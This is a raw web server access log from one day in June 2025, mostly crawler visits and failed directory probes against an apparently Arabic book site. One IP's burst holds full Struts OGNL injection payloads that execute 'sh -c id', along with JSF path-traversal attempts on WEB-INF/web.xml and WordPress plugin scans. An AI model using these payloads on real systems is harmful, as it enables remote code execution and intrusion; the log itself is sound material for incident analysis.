66.249.76.161 - - [15/Jun/2025:12:57:17 +0200] "GET /?afdl-nsayh-llmrahnat-alryadyt-fy-alasmaylyt-dlyl-shaml-llnjah HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.132.133.44 - - [15/Jun/2025:13:00:37 +0200] "GET /products/%D9%85%D9%86-%D9%87%D9%86%D8%A7-%D8%A5%D9%84%D9%89-%D8%A7%D9%84%D9%82%D9%84%D8%A8/176?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
185.132.133.149 - - [15/Jun/2025:13:00:38 +0200] "GET /?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
44.195.85.124 - - [15/Jun/2025:13:18:46 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
3.235.136.131 - - [15/Jun/2025:13:44:52 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
185.132.133.184 - - [15/Jun/2025:13:57:21 +0200] "GET /?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
216.244.66.237 - - [15/Jun/2025:14:02:34 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.73.216.64 - - [15/Jun/2025:14:09:58 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.64 - - [15/Jun/2025:14:09:58 +0200] "GET /sitemap.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.163 - - [15/Jun/2025:14:24:11 +0200] "GET /products/%D8%B5%D8%AE%D8%A8-%D8%A7%D9%84%D8%AE%D8%B3%D9%8A%D9%81-3/184 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.237 - - [15/Jun/2025:14:27:35 +0200] "GET /product/pages/48 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
13.219.226.89 - - [15/Jun/2025:15:18:03 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
66.249.75.236 - - [15/Jun/2025:15:22:30 +0200] "GET /category/%D8%AA%D9%86%D9%85%D9%8A%D8%A9-%D8%A7%D9%84%D8%B0%D8%A7%D8%AA/124 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.180.98.84 - - [15/Jun/2025:15:35:32 +0200] "GET / HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:35:44 +0200] "GET /wp HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:35:54 +0200] "GET /wordpress HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:35:58 +0200] "GET /php HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:36:04 +0200] "GET /wordpress HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:36:22 +0200] "GET /old HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:36:36 +0200] "GET /backup HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:36:53 +0200] "GET /new HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:37:01 +0200] "GET /test HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:37:22 +0200] "GET /wp HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:37:51 +0200] "GET /temp HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.98.84 - - [15/Jun/2025:15:38:03 +0200] "GET /blog HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
66.249.76.161 - - [15/Jun/2025:15:50:42 +0200] "GET /products/%D8%A7%D9%84%D8%AB%D9%82%D8%A7%D9%81%D8%A9-%D8%A7%D9%84%D8%AF%D9%88%D8%A7%D8%A6%D9%8A%D8%A9/122 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
13.221.152.19 - - [15/Jun/2025:16:08:01 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
216.73.216.64 - - [15/Jun/2025:16:20:54 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.64 - - [15/Jun/2025:16:20:55 +0200] "GET /sitemap.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
45.192.99.121 - - [15/Jun/2025:16:59:19 +0200] "GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0"
66.249.75.236 - - [15/Jun/2025:17:05:34 +0200] "GET /category/%D8%AF%D9%8A%D9%86%D9%8A/136 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.162 - - [15/Jun/2025:17:41:07 +0200] "GET /products/%D8%B5%D8%A7%D8%A6%D8%AF-%D8%A7%D9%84%D8%B3%D8%A7%D8%AD%D8%B1%D8%A7%D8%AA/216 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [15/Jun/2025:18:01:57 +0200] "GET /authors/148 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
13.37.42.226 - - [15/Jun/2025:18:05:29 +0200] "GET / HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:05:34 +0200] "GET /wp HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:05:37 +0200] "GET /wordpress HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:05:39 +0200] "GET /php HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:05:41 +0200] "GET /wordpress HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:06:00 +0200] "GET /old HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:06:03 +0200] "GET /backup HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:06:09 +0200] "GET /new HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:06:09 +0200] "GET /test HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:06:11 +0200] "GET /wp HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:06:14 +0200] "GET /temp HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
13.37.42.226 - - [15/Jun/2025:18:06:19 +0200] "GET /blog HTTP/1.1" 500 542 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Mobile/15E148 Safari/604.1"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 500 542 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/119.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/107.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:10:49 +0200] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0"
52.167.144.186 - - [15/Jun/2025:18:15:03 +0200] "GET /sitemap.xml.gz HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:33:27 +0200] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:18:33:27 +0200] "POST / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
45.192.99.121 - - [15/Jun/2025:19:00:54 +0200] "GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
45.192.99.121 - - [15/Jun/2025:19:00:54 +0200] "GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:19:00:54 +0200] "GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
45.192.99.121 - - [15/Jun/2025:19:00:54 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/116.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:19:00:54 +0200] "GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
45.192.99.121 - - [15/Jun/2025:19:00:54 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:19:00:54 +0200] "GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:19:00:54 +0200] "GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
157.55.39.223 - - [15/Jun/2025:19:24:38 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.223 - - [15/Jun/2025:19:24:38 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.45 - - [15/Jun/2025:19:24:41 +0200] "GET /sitemap.xml.gz HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.76.162 - - [15/Jun/2025:19:46:15 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.161 - - [15/Jun/2025:19:46:15 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.224 - - [15/Jun/2025:19:46:16 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [15/Jun/2025:19:46:16 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.210.140.140 - - [15/Jun/2025:20:13:57 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
